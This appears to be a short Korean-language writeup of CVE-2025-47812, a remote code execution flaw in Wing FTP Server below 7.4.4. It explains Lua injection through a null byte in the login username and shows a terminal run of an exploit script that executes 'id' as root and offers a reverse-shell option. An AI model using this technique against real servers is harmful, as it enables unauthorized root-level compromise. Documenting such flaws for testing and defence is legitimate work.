
CVE-2025-47812
CVE-2025-47812는 Wing FTP Server 7.4.4 이전 버전에 영향을 미치는 치명적인 원격 코드 실행(RCE) 취약점입니다. 보안 연구원에 의해 발견되었으며, 실제 환경에서 적극적으로 악용되고 있는 것으로 확인되었습니다.
이 취약점은 Wing FTP Server의 인증 로직, 특히 username 매개변수의 널 바이트(\0) 처리 방식에 존재합니다.
공격자는 username 필드를 통해 임의의 Lua 코드를 주입할 수 있으며, 서버는 이를 세션 파일에 기록합니다. 이후 이 세션 파일이 처리될 때 주입된 Lua 코드가 실행되어 공격자가 시스템 수준의 명령을 실행할 수 있게 됩니다.
/loginok.html┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-47812.py
============================================================
CVE-2025-47812 - Wing FTP Server RCE Exploit
============================================================
Target URL (e.g., http://localhost:5466): http://10.10.10.10
Username (e.g., anonymous): anonymous
1) Run Command
2) Get Reverse Shell
Your choice (1 or 2): 1
Command to execute (default: whoami): id
[*] Trying to get UID... Payload: id
[*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
[*] Sending /dir.html request...
[*] HTTP 200
------ Response Start ------
uid=0(root) gid=0(root) groups=0(root)
<?xml version="1.0" encoding="UTF-8" ?>
<alldata><nowdir><![CDATA[/]]></nowdir>
<dirdata>
</dirdata>
<nowquota>0</nowquota>
<maxquota>0</maxquota>
<readfile>1</readfile>
</alldata>
------ Response End ------
이 익스플로잇은 교육 목적으로만 제공됩니다. 명시적 테스트 허가를 받은 시스템에서만 책임감 있게 사용하십시오. 저자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다.